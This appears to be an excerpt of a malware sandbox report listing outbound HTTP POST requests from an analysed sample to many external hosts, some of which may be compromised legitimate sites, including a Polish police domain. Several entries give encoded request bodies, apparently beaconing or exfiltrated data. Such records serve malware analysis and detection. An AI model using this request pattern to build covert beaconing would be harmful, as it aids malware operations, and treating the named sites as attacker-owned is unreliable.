                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 750User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: araax.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 4c 58 67 71 7a 38 48 52 61 6a 74 32 42 4b 54 64 6d 77 35 45 4e 57 66 70 79 37 47 51 5a 6b 76 34 44 4d 59 68 72 30 41 4b 54 63 6c 79 37 48 53 64 72 32 45 50 62 70 31 44 52 63 70 30 43 51 63 6f 30 43 4f 5a 6d 7a 43 4f 61 6d 7a 42 4e 62 6f 32 46 51 65 72 33 46 52 65 72 33 45 52 63 70 31 45 51 63 70 32 44 51 64 70 31 45 50 63 72 34 46 51 63 70 31 44 50 62 6f 30 43 4e 5a 6c 78 41 4d 59 6b 77 38 4b 57 69 76 37 4a 56 68 74 34 48 53 65 75 35 4a 56 67 74 35 48 54 66 72 32 45 51 63 70 31 45 51 63 70 32 46 51 63 70 31 44 50 63 70 32 44 53 64 71 32 45 51 63 70 31 44 4f 62 71 32 47 53 64 73 34 46 54 65 72 34 46 52 65 72 33 46 52 64 71 34 46 52 65 71 32 45 50 63 70 31 45 52 64 73 33 47 53 64 72 32 46 53 64 70 32 44 50 63 6f 31 46 51 63 70 31 43 51 63 70 30 43 4f 61 6d 7a 41 4e 5a 6b 79 41 4e 5a 6c 78 39 4d 59 6b 78 38 4b 58 6a 77 38 4b 56 68 75 36 49 54 67 76 36 4a 56 68 74 36 49 54 68 75 36 49 55 68 75 37 4a 56 68 75 36 49 56 67 74 35 48 56 68 75 36 49 55 66 73 34 47 53 65 73 36 49 56 69 77 38 4b 57 6a 77 38 4b 56 68 75 36 4a 57 69 75 37 4b 56 68 75 36 49 55 68 75 36 49 57 68 74 36 48 54 66 73 37 49 56 69 76 37 4a 57 69 75 36 48 54 66 74 36 4a 56 68 76 37 4a 57 6a 77 38 4b 57 6a 76 36 49 55 67 74 34 47 53 65 71 32 45 52 64 72 34 46 53 64 71 32 44 50 62 6f 31 43 50 62 6f 30 45 52 63 6f 30 43 50 61 6f 7a 43 4f 61 6d 30 43 51 62 6f 31 44 50 65 72 34 46 53 64 71 31 44 50 61 6d 7a 43 4f 62 6f 30 43 50 62 6d 7a 43 4e 62 6f 30 42 4f 61 6d 79 42 4e 61 6d 79 43 4f 62 6f 7a 42 4f 5a 6d 7a 42 4e 61 6d 30 42 4f 5a 6c 79 39 4c 5a 6b 78 39 4b 57 6a 77 38 4b 57 69 76 37 4a 57 69 77 39 4c 57 69 75 36 4a 57 69 76 37 4a 56 68 74 36 49 54 67 73 36 49 54 67 75 35 48 54 65 73 35 48 54 68 76 37 4b 58 6a 77 38 4d 59 6b 78 41 4c 58 6a 77 37 4a 56 68 75 36 49 55 66 73 35 47 53 66 72 34 47 53 67 76 36 49 57 68 76 38 4c 58 6a 77 38 4b 58 69 75 36 49 55 69 76 37 47 50 59 69 73 31 41 4a 53 62 6b 75 33 43 4e 5a 58 75 35 45 4e 58 67 71 7a 38 48 53 64 4d 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 57 6a 45 5a 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 66 70 79 42 31 43 4c 55 66 72 52 63 70 79 69 75 79 36 4f 58 67 71 7a 37 47 50 59 68 71 7a 38 48 51 59 68 72 7a 38 48 51 59 68 72 30 38 48 51 5a 68 72 30 39 48 51 5a 69 72 30 39 49 51 5a 69 73 30 43 4c 55 64 6d 77 34 Data Ascii: LXgqz8HRajt2BKTdmw5ENWfpy7GQZkv4DMYhr0AKTcly7HSdr2EPbp1DRcp0CQco0COZmzCOamzBNbo2FQer3FRer3ERcp1EQcp2DQdp1EPcr4FQcp1DPbo0CNZlxAMYkw8KWiv7JVht4HSeu5JVgt5HTfr2EQcp1EQcp2FQcp1DPcp2DSdq2EQcp1DObq2GSds4FTer4FRer3FRdq4FReq2EPcp1ERds3GSdr2FSdp2DPco1FQcp1CQcp0COamzANZkyANZlx9MYkx8KXjw8KVhu6ITgv6JVht6IThu6IUhu7JVhu6IVgt5HVhu6IUfs4GSes6IViw8KWjw8KVhu6JWiu7KVhu6IUhu6IWht6HTfs7IViv7JWiu6HTft6JVhv7JWjw8KWjv6IUgt4GSeq2ERdr4FSdq2DPbo1CPbo0ERco0CPaozCOam0CQbo1DPer4FSdq1DPamzCObo0CPbmzCNbo
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1529User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: karmy.com.plConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 271User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: kevyt.netConnection: Keep-AliveCache-Control: no-cacheData Raw: 55 6a 75 34 44 4e 57 67 71 7a 39 49 53 62 6c 77 35 45 4f 58 67 72 30 39 4a 53 63 6c 76 35 45 4e 58 67 72 30 41 4a 53 63 6c 77 35 45 4f 58 68 72 30 41 4a 54 63 6c 77 35 46 4f 58 67 72 30 39 4a 53 64 6d 78 36 46 50 59 68 73 31 42 4b 54 64 6d 78 36 47 50 59 69 73 32 42 4b 55 64 6d 78 36 46 50 59 69 73 31 42 4b 54 64 72 79 50 5a 6a 75 33 43 4d 56 66 70 7a 39 49 53 62 6b 76 34 45 4e 57 67 72 31 41 4a 54 63 6c 77 35 46 69 74 33 43 4c 56 65 6f 79 37 48 51 5a 6a 74 33 43 4c 56 65 6f 79 37 48 51 5a 6a 74 32 42 4c 55 64 6f 78 36 47 50 59 69 73 38 49 53 62 6b 79 38 48 51 61 6a 75 34 45 4e 58 67 71 30 39 49 53 62 6b 75 34 44 4e 57 66 71 7a 38 49 52 62 6b 75 34 44 50 59 69 73 32 43 4c 55 65 6f 78 37 47 50 5a 69 73 32 42 4b 55 64 6f 78 36 47 50 61 6b 76 34 45 4e 57 67 72 31 43 4c 55 65 6f 79 37 47 51 5a 69 74 32 43 Data Ascii: Uju4DNWgqz9ISblw5EOXgr09JSclv5ENXgr0AJSclw5EOXhr0AJTclw5FOXgr09JSdmx6FPYhs1BKTdmx6GPYis2BKUdmx6FPYis1BKTdryPZju3CMVfpz9ISbkv4ENWgr1AJTclw5Fit3CLVeoy7HQZjt3CLVeoy7HQZjt2BLUdox6GPYis8ISbky8HQaju4ENXgq09ISbku4DNWfqz8IRbku4DPYis2CLUeox7GPZis2BKUdox6GPakv4ENWgr1CLUeoy7GQZit2C
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sclover3.comCache-Control: no-cacheData Raw: 50 46 6d 35 64 35 42 6f 79 43 57 53 77 58 68 36 49 36 4a 56 4e 30 50 79 73 41 32 34 47 70 66 6b 78 4e 6a 6d 59 39 6a 75 2b 51 4f 41 53 62 43 69 30 73 68 78 30 78 6a 32 6e 79 79 6b 38 35 44 63 76 35 58 44 72 6d 32 62 55 4d 55 6b 33 6e 6c 4d 53 52 31 5a 59 4d 36 4c 43 4d 56 2b 71 5a 66 55 77 62 76 59 37 58 5a 64 36 54 72 77 52 66 57 68 4f 52 63 75 59 2f 63 47 7a 6d 35 4b 6b 65 53 41 46 78 2b 46 46 41 35 2f 47 59 56 79 57 4e 79 43 39 4f 6f 43 57 61 48 4e 30 37 54 7a 6c 78 6a 44 4e 69 37 4f 34 67 63 4d 57 45 37 7a 79 4b 58 53 52 74 4a 35 54 7a 39 34 71 6f 54 71 71 2b 56 57 47 4c 41 4f 55 69 4b 77 72 6c 74 30 33 58 54 2f 6b 49 64 6b 5a 4f 34 73 4d 38 72 74 30 38 61 47 67 50 6f 62 72 6b 35 39 44 39 6f 68 59 53 35 50 36 58 42 6e 42 55 52 31 4d 78 72 6b 6c 38 6c 77 51 67 6d 43 51 61 48 2b 43 41 56 31 36 5a 44 6b 43 6a 6b 6e 56 4e 41 33 6b 6b 64 34 67 56 37 6d 31 52 6e 76 76 65 71 59 54 6f 4a 59 65 48 30 37 32 2b 70 70 45 57 63 32 6e 58 37 75 6c 52 4a 76 34 2b 68 38 34 72 68 58 42 4a 39 6d 2f 6e 34 53 6b 67 57 44 61 52 36 47 57 55 4e 49 38 55 42 51 79 73 50 43 53 35 44 54 53 69 7a 50 31 38 2f 39 59 44 47 72 4b 52 4e 65 73 66 76 4d 32 70 58 5a 4b 73 45 73 4d 45 67 4d 79 6a 51 4a 49 56 49 64 36 76 6f 43 67 30 43 4b 73 4c 56 33 65 42 6d 55 44 70 69 67 42 4f 35 68 4d 34 6d 78 44 2f 76 79 45 6f 4b 52 6c 6a 4b 6c 53 4f 68 64 52 70 31 49 52 64 34 67 73 62 75 61 72 75 64 6f 5a 61 4b 74 4c 45 50 6d 78 68 48 32 6a 75 58 75 75 4e 4b 2b 42 42 63 35 75 45 4a 51 44 78 55 33 58 76 42 4c 69 41 48 4c 31 79 48 53 67 55 4a 41 44 4c 33 48 44 55 41 6d 47 6e 69 59 33 49 54 6c 58 36 61 42 58 66 7a 56 48 45 58 35 79 39 42 4f 6f 30 48 57 55 31 48 38 7a 5a 4d 71 6d 36 6d 73 4d 78 75 4d 71 42 6b 74 36 7a 63 3d Data Ascii: PFm5d5BoyCWSwXh6I6JVN0PysA24GpfkxNjmY9ju+QOASbCi0shx0xj2nyyk85Dcv5XDrm2bUMUk3nlMSR1ZYM6LCMV+qZfUwbvY7XZd6TrwRfWhORcuY/cGzm5KkeSAFx+FFA5/GYVyWNyC9OoCWaHN07TzlxjDNi7O4gcMWE7zyKXSRtJ5Tz94qoTqq+VWGLAOUiKwrlt03XT/kIdkZO4sM8rt08aGgPobrk59D9ohYS5P6XBnBUR1Mxrkl8lwQgmCQaH+CAV16ZDkCjknVNA3kkd4gV7m1RnvveqYToJYeH072+ppEWc2nX7ulRJv4+h84rhXBJ9m/n4SkgWDaR6GWUNI8UBQysPCS5DTSizP18/9YDGrKRNesfvM2pXZKsEsMEgMyjQJIVId6voCg0CKsLV3eBmUDpigBO5hM4mxD/vyEoKRljKlSOhdRp1IRd4gsbuarudoZaKtLEPmxhH2juXuuNK+BBc5uEJQDxU3XvBLiAHL1yHSgUJADL3HDUAmGniY3ITlX6aBXfzVHEX5y9BOo0HWU1H8zZMqm6msMxuMqBkt6zc=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: pleszew.policja.gov.plCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 968User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: msl-lock.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 61 32 34 74 57 34 59 66 58 53 62 6e 4a 30 6f 6e 6f 66 48 4f 58 61 6b 69 62 67 48 6d 34 33 46 67 47 72 79 41 43 53 59 44 42 53 75 6f 5a 47 58 6a 38 59 62 33 63 62 5a 37 6f 7a 68 46 70 57 4a 73 52 6e 4b 46 45 30 4f 36 38 35 78 6a 6f 69 35 55 79 43 4b 33 37 53 6d 61 52 68 37 67 39 65 45 4c 30 2b 75 47 58 55 63 63 59 36 48 65 62 6c 4c 50 38 52 50 5a 75 5a 76 6b 49 7a 46 7a 4a 4c 36 7a 6f 4a 30 75 6f 4b 6d 4f 31 2b 64 58 39 6a 33 59 41 79 67 4e 6c 37 64 32 49 49 65 65 6e 77 32 38 56 69 4f 34 54 2f 6b 62 65 64 54 52 30 4b 31 77 43 71 70 36 50 4f 32 38 51 67 6d 66 31 33 61 31 61 35 77 5a 2f 37 49 72 71 63 54 31 39 54 2f 76 76 4e 48 4a 6c 33 76 39 6f 42 79 62 6f 32 74 36 6f 72 4c 68 68 5a 68 47 79 46 47 33 6e 65 7a 34 6e 64 78 64 34 42 45 59 70 71 4c 38 4b 6d 73 72 67 58 56 62 69 75 52 63 4a 38 6e 59 4a 77 78 74 44 4a 2f 4b 6d 5a 43 6c 4c 75 4c 31 2f 6a 30 46 6f 31 33 6a 53 56 2b 4e 56 43 51 4c 30 71 74 51 72 6a 48 43 34 78 34 55 63 7a 4e 66 71 4c 68 30 59 71 6f 56 35 39 33 4b 52 6e 55 73 31 48 38 63 64 31 52 6f 4e 35 45 54 65 76 52 37 70 55 4b 50 57 72 32 55 63 47 44 66 63 7a 43 4a 2b 59 45 69 43 58 74 58 2b 36 5a 65 54 77 47 2f 6a 39 51 4e 58 56 62 68 47 4a 58 4a 2f 38 44 6d 44 42 38 5a 76 43 4c 66 74 64 65 52 42 47 5a 44 2f 62 76 6c 64 4c 4e 77 61 31 6c 4f 2f 75 52 74 42 77 53 45 56 34 4f 6f 55 69 46 30 58 7a 2b 39 74 7a 6e 6c 76 6b 71 4d 77 79 55 34 50 70 62 6f 39 4c 6e 48 38 65 54 4c 61 5a 6f 75 4d 4c 50 64 32 36 63 57 6e 77 79 6b 41 49 53 6a 2b 64 65 57 50 4b 6e 68 6a 66 2b 42 64 43 34 30 42 42 4a 71 39 77 2b 42 2b 4b 75 7a 59 66 69 33 4f 62 75 74 75 73 49 4d 6b 51 36 73 65 53 4b 52 52 50 54 58 Data Ascii: a24tW4YfXSbnJ0onofHOXakibgHm43FgGryACSYDBSuoZGXj8Yb3cbZ7ozhFpWJsRnKFE0O685xjoi5UyCK37SmaRh7g9eEL0+uGXUccY6HeblLP8RPZuZvkIzFzJL6zoJ0uoKmO1+dX9j3YAygNl7d2IIeenw28ViO4T/kbedTR0K1wCqp6PO28Qgmf13a1a5wZ/7IrqcT19T/vvNHJl3v9oBybo2t6orLhhZhGyFG3nez4ndxd4BEYpqL8KmsrgXVbiuRcJ8nYJwxtDJ/KmZClLuL1/j0Fo13jSV+NVCQL0qtQrjHC4x4UczNfqLh0YqoV593KRnUs1H8cd1RoN5ETevR7pUKPWr2UcGDfczCJ+YEiCXtX+6ZeTwG/j9QNXVbhGJXJ/8DmDB8ZvCLftdeRBGZD/bvldLNwa1lO/uRtBwSEV4OoUiF0Xz+9tznlvkqMwyU4Ppbo9LnH8eTLaZouMLPd26cWnwykAISj+deWPKnhjf+BdC40BBJq9w+B+KuzYfi3ObutusIMkQ6seSKRRPTX
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: indonesiamedia.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1329User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: xult.orgConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: dbnet.atCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: diamir.deCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 498User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: pers.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 55 67 73 31 41 4b 54 64 6d 78 37 47 51 5a 6a 74 33 43 4c 56 66 70 79 38 48 52 61 6b 75 34 44 4e 58 67 72 30 41 4a 54 63 6d 77 36 46 50 59 69 73 31 42 4b 55 64 6d 78 36 47 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 52 62 6b 76 34 45 4e 57 67 71 30 39 4a 53 62 6c 76 35 45 4f 59 68 73 31 4a 54 64 6d 78 36 49 53 62 6c 76 35 45 4e 58 69 74 32 42 4c 57 67 72 30 39 4d 57 66 70 31 41 4b 54 64 6f 7a 38 49 52 62 6b 75 34 44 4e 57 66 71 7a 39 49 52 62 6b 76 34 44 4e 57 67 71 7a 39 49 53 62 6c 76 35 45 4f 58 68 72 31 41 4b 54 63 6d 77 35 46 50 59 69 73 32 42 4b 55 64 6f 78 37 47 51 61 6a 75 34 44 4e 57 67 72 30 41 4a 54 63 6d 77 36 46 4f 59 68 73 31 41 4b 54 64 6d 78 36 46 50 59 69 73 32 42 4b 55 64 6f 78 36 47 50 5a 69 74 32 42 4c 55 65 6f 78 37 47 51 5a 69 74 44 4d 57 68 72 31 41 4a 54 63 6c 76 35 45 4e 57 66 70 7a 38 48 51 5a 69 73 31 41 4a 53 63 6c 76 34 44 4d 56 65 6f 78 36 47 50 59 68 72 30 39 49 53 62 6b 75 33 43 4c 55 64 6d 78 36 46 4f 58 67 72 30 39 49 52 62 6b 75 33 44 4d 56 65 6f 79 37 47 50 59 68 72 30 39 4a 53 62 6b 75 33 43 4c 55 65 6f 78 36 46 4f 58 67 72 30 39 49 52 61 6b 75 33 43 4d 56 65 6f 78 36 47 50 59 68 72 30 39 49 52 61 6b 75 33 43 4c 56 65 6f 78 36 46 4f 58 6a 75 33 43 4c 55 64 6f 78 36 46 4f 58 67 71 7a 39 49 52 61 6a 74 32 42 4b 54 63 6c 77 35 45 4e 57 66 70 30 39 49 52 61 6a 74 32 42 4b 55 64 6d 77 35 46 4f 58 67 71 7a 38 49 52 61 6a 74 32 42 4b 54 63 6c 76 35 45 4e 57 66 70 79 37 47 50 5a 69 73 31 41 4a 53 62 6b 76 34 44 4d 56 65 6f 78 36 46 50 59 68 72 30 Data Ascii: Ugs1AKTdmx7GQZjt3CLVfpy8HRaku4DNXgr0AJTcmw6FPYis1BKUdmx6GQZjt3CMVfpz8IRbkv4ENWgq09JSblv5EOYhs1JTdmx6ISblv5ENXit2BLWgr09MWfp1AKTdoz8IRbku4DNWfqz9IRbkv4DNWgqz9ISblv5EOXhr1AKTcmw5FPYis2BKUdox7GQaju4DNWgr0AJTcmw6FOYhs1AKTdmx6FPYis2BKUdox6GPZit2BLUeox7GQZitDMWhr1AJTclv5ENWfpz8HQZis1AJSclv4DMVeox6GPYhr09ISbku3CLUdmx6FOXgr09IRbku3DMVeoy7GPYhr09JSbku3CLUeox6FOXgr09IRaku3CMVeox6GPYhr09IRaku3CLVeox6FOXju3CLUdox6FOXgqz9IRajt2BKTclw5ENWfp09IRajt2BKUdmw5FOXgqz8IRajt2BKTclv5ENWfpy7GPZis1AJSbkv4DMVeox6FPYhr0
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 837User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: s5w.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: impexnc.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 469User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: from30ty.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 4a 57 66 71 7a 38 49 52 61 6b 75 34 44 4e 57 67 71 30 39 49 53 62 6c 76 34 45 4e 58 67 71 30 41 4a 54 66 71 7a 41 4b 54 64 6d 77 36 46 50 59 69 73 33 43 4c 56 65 70 79 37 48 51 61 6a 77 35 46 4f 5a 69 73 32 42 4c 55 64 6f 78 36 47 50 5a 69 73 32 43 4c 55 65 6f 79 37 48 51 5a 6a 74 33 43 4c 56 65 70 79 37 48 51 5a 6a 74 33 43 4d 56 65 70 79 38 48 51 61 6a 75 33 44 4d 56 66 70 7a 38 48 52 61 6b 75 33 44 4d 57 66 70 7a 38 49 52 62 6b 75 34 44 4f 59 69 73 32 42 4c 55 67 72 34 46 50 59 69 73 65 71 7a 39 49 53 64 6d 78 36 47 50 59 69 73 32 42 4b 55 65 6f 78 37 47 51 5a 69 74 32 43 4c 56 65 70 79 37 48 51 61 6a 74 33 43 4c 56 65 6f 79 38 48 51 61 6a 75 33 44 4e 57 67 71 30 42 4b 54 64 6f 78 37 47 50 5a 69 73 32 42 4c 55 64 6f 79 37 47 51 5a 6a 74 32 43 4c 57 66 71 7a 41 4b 54 64 6f 79 37 47 51 5a 69 74 32 43 4c 55 65 70 79 37 49 52 61 6b 75 34 44 4d 57 67 72 30 39 4b 54 63 6d 77 35 46 4f 58 68 72 31 41 4b 54 63 6d 77 36 46 50 61 6b 75 34 44 4d 57 66 71 7a 39 49 52 62 6b 76 34 44 4e 57 66 71 30 43 4c 55 65 6f 79 37 49 52 62 6b 76 34 44 4e 57 67 71 7a 39 4a 53 62 6c 76 34 45 4e 58 67 71 30 39 4a 53 63 6c 76 35 45 4f 58 67 73 31 42 4b 55 65 70 79 38 61 6c 76 35 46 50 59 69 73 32 42 4d 56 66 70 7a 39 49 53 62 6b 76 34 45 4e 57 67 71 30 39 49 53 63 6c 76 35 45 4e 58 68 72 32 42 4b 55 64 6f 78 36 47 50 5a 69 73 32 42 4c 55 65 6f 79 37 47 51 5a 6a 74 33 44 4d 57 69 78 51 61 6f 78 51 63 6c 77 35 46 Data Ascii: JWfqz8IRaku4DNWgq09ISblv4ENXgq0AJTfqzAKTdmw6FPYis3CLVepy7HQajw5FOZis2BLUdox6GPZis2CLUeoy7HQZjt3CLVepy7HQZjt3CMVepy8HQaju3DMVfpz8HRaku3DMWfpz8IRbku4DOYis2BLUgr4FPYiseqz9ISdmx6GPYis2BKUeox7GQZit2CLVepy7HQajt3CLVeoy8HQaju3DNWgq0BKTdox7GPZis2BLUdoy7GQZjt2CLWfqzAKTdoy7GQZit2CLUepy7IRaku4DMWgr09KTcmw5FOXhr1AKTcmw6FPaku4DMWfqz9IRbkv4DNWfq0CLUeoy7IRbkv4DNWgqz9JSblv4ENXgq09JSclv5EOXgs1BKUepy8alv5FPYis2BMVfpz9ISbkv4ENWgq09ISclv5ENXhr2BKUdox6GPZis2BLUeoy7GQZjt3DMWixQaoxQclw5F
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 511User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: a-domani.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 55 6a 7a 48 61 74 42 56 71 37 51 69 31 44 57 6d 37 4a 53 61 6a 74 32 41 4a 53 62 6b 75 33 43 4c 58 43 43 4d 56 65 72 32 46 54 69 79 42 50 64 72 34 48 58 6a 78 43 50 63 72 34 49 61 73 38 52 6d 45 55 6f 38 51 6a 33 49 61 76 44 57 73 38 51 6a 31 4b 63 72 41 55 6f 37 4f 69 79 49 61 75 42 53 6c 35 4e 67 30 49 61 73 39 54 6c 33 49 65 78 47 56 6d 36 4f 69 31 45 52 6b 36 51 6a 31 4b 59 74 45 58 71 46 58 70 42 58 76 48 63 77 38 48 51 5a 68 72 30 39 49 52 61 6a 74 31 41 4a 53 62 6b 75 33 43 4b 54 63 6c 76 34 44 4c 55 64 6f 7a 38 47 50 5a 68 72 30 39 49 52 61 6a 73 32 44 4d 56 65 6d 79 36 46 4f 5a 69 73 31 41 4a 53 62 6a 74 32 42 4b 54 62 6b 75 33 4b 55 64 6d 77 35 46 4f 58 67 71 79 37 47 50 59 68 72 30 44 4e 58 67 71 30 39 49 51 5a 69 73 31 39 49 52 61 6a 74 32 42 4b 55 65 70 79 37 48 51 5a 68 72 30 39 49 52 61 69 73 31 42 4b 57 66 70 31 41 49 52 61 6a 75 35 45 4e 56 65 6f 79 36 46 4f 58 67 73 31 42 4b 54 63 6c 75 33 43 4c 55 64 6c 77 35 45 4e 57 66 70 78 36 47 50 59 68 72 30 39 48 51 5a 69 73 32 42 4a 56 65 6f 78 36 45 4e 57 66 72 30 39 49 51 5a 69 73 33 42 4d 56 65 6f 78 36 46 4f 57 66 70 7a 38 48 55 64 6d 78 36 46 4f 58 67 70 79 37 47 50 59 68 74 33 43 4c 55 64 6d 77 35 44 4d 56 65 6f 78 39 4c 55 65 6f 78 36 45 4e 57 67 72 30 41 4a 53 61 6a 74 32 42 4c 56 64 6d 77 35 45 4e 57 66 70 79 37 47 4f 58 67 71 7a 38 47 50 59 68 72 30 39 48 52 61 6a 73 31 41 4a 53 62 6b 75 33 42 4b 54 63 6c 76 34 44 4c 55 67 70 79 37 47 50 59 68 71 7a 38 48 51 5a 69 72 30 39 49 52 63 6b 76 34 44 4c 57 65 6f 78 36 46 4f 58 67 70 79 37 47 50 Data Ascii: UjzHatBVq7Qi1DWm7JSajt2AJSbku3CLXCCMVer2FTiyBPdr4HXjxCPcr4Ias8RmEUo8Qj3IavDWs8Qj1KcrAUo7OiyIauBSl5Ng0Ias9Tl3IexGVm6Oi1ERk6Qj1KYtEXqFXpBXvHcw8HQZhr09IRajt1AJSbku3CKTclv4DLUdoz8GPZhr09IRajs2DMVemy6FOZis1AJSbjt2BKTbku3KUdmw5FOXgqy7GPYhr0DNXgq09IQZis19IRajt2BKUepy7HQZhr09IRais1BKWfp1AIRaju5ENVeoy6FOXgs1BKTclu3CLUdlw5ENWfpx6GPYhr09HQZis2BJVeox6ENWfr09IQZis3BMVeox6FOWfpz8HUdmx6FOXgpy7GPYht3CLUdmw5DMVeox9LUeox6ENWgr0AJSajt2BLVdmw5ENWfpy7GOXgqz8GPYhr09HRajs1AJSbku3BKTclv4DLUgpy7GPYhqz8HQZir09IRckv4DLWeox6FOXgpy7GP
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 607User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: orbitgas.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 6f 79 37 47 50 59 68 72 30 39 49 52 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 51 63 6d 77 35 45 4e 57 66 70 79 37 47 50 59 69 73 31 41 4a 53 62 6b 75 34 44 4d 56 65 6f 78 36 46 4f 58 68 72 30 39 49 53 63 6d 77 35 45 4e 57 66 70 79 38 48 51 5a 69 73 31 41 4a 53 62 6b 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 72 30 39 49 52 61 6a 74 32 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 5a 69 73 31 41 4a 53 62 6b 75 33 45 4f 58 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4e 57 66 70 79 37 47 50 59 68 72 30 41 4a 53 62 6b 75 33 43 4c 55 64 6f 78 36 46 4f 58 67 71 7a 39 49 52 61 6a 74 33 43 4c 55 64 6f 78 36 46 4f 58 67 71 7a 38 48 51 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 70 79 37 47 50 5a 69 73 31 41 4b 54 63 6c 76 34 44 4d 55 67 73 31 41 4d 56 65 6f 30 47 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 64 6f 78 36 47 50 59 68 72 30 39 49 53 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 79 37 47 50 59 68 72 31 41 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 50 59 68 72 31 41 4a 53 62 6b 74 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 75 33 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 49 53 61 6a 74 32 42 4b 55 63 6c 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 46 4f 58 67 71 79 37 48 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 52 6f 78 37 47 51 59 68 72 30 41 4a 53 62 6b 75 33 43 4c 54 63 6d 77 35 45 4e 57 65 6f 78 36 46 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 Data Ascii: 